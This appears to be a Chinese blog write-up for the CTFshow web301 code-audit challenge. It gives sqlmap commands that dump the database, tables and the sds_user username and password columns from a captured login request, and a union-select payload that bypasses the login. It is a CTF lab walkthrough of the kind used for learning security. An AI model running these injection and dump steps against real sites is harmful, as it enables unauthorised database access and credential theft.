【原创】CTFshow—代码审计
[huayang]

该来的还是要来

分享个代码审计的工具Seay

链接: https://pan.baidu.com/s/1Bf4CzqN2Dk1NjCpnC2laXA 密码: c99g

web301

下载源码审计看看

我审nm个*****

去看看检测登录的checklogin.php文件

sql语句没有任何过滤

sqlmap跑一下

因为这里看不见注入点

所以就需要用bp抓包引入数据

复制数据保存为test.txt文件

python3 sqlmap.py -r test.txt --dbs
python3 sqlmap.py -r test.txt -D sds --tables --batch
python3 sqlmap.py -r test.txt -D sds -T sds_user  --columns --batch
python3 sqlmap.py -r test.txt -D sds -T sds_user  -C sds_password --dump --batch
python3 sqlmap.py -r test.txt -D sds -T sds_user  -C sds_username --dump --batch

当然也可以直接使用sqlmap表单查询搞下来,只不过时间有点久

python3 sqlmap.py -u http://396c27a6-b4b7-4010-880a-b51531e43147.chall.ctf.show/login.php  --forms --batch --dump

方法二

具体可参照https://hellohy.top/huayang/658.html

userid='union select'1'#&userpwd=1

[/huayang]

==>转载请注明来源哦<==

评论

  1. 11
    Windows Edge
    3月前
    2021-9-14 11:13:41

    1

  2. 鬼影H
    Macintosh Chrome
    4月前
    2021-8-17 19:46:30

    谢大佬wp

  3. Lxx
    Windows Chrome
    6月前
    2021-6-21 15:33:35

    看看

  4. huayang 博主
    Macintosh Chrome
    7月前
    2021-5-09 19:25:35

    Σ(っ °Д °;)っ

  5. 嘤嘤嘤
    Windows Chrome
    7月前
    2021-5-09 16:16:56

    弟弟想学习

  6. 华扬 博主
    9月前
    2021-3-04 15:56:55

    康康

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇